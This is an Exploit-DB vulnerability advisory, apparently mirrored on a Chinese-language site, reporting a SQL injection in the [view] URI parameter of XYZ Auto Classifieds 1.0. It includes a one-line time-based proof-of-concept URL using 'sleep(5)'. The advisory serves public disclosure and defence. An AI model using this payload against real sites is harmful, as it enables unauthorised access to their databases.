XYZ Auto Classifieds 1.0 – SQL Injection

  • 作者: 8bitsec
    日期: 2017-09-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42727/
  • # Exploit Title: XYZ Auto Classifieds v1.0 - SQL Injection
    # Date: 2017-09-12
    # Exploit Author: 8bitsec
    # Vendor Homepage: http://xyzscripts.com/
    # Software Link: https://xyzscripts.com/php-scripts/xyz-auto-classifieds/details
    # Version: 1.0
    # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
    # Email: contact@8bitsec.io
    # Contact: https://twitter.com/_8bitsec
    
    Release Date:
    =============
    2017-09-12
    
    Product & Service Introduction:
    ===============================
    XYZ Auto Classifieds is a simple and robust PHP + MySQL based auto classifieds script with all options required to start your own auto classifieds site like cars.com.
    
    Technical Details & Description:
    ================================
    
    SQL injection on [view] URI parameter.
    
    Proof of Concept (PoC):
    =======================
    
    SQLi:
    
    http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
    
    ==================
    8bitsec - [https://twitter.com/_8bitsec]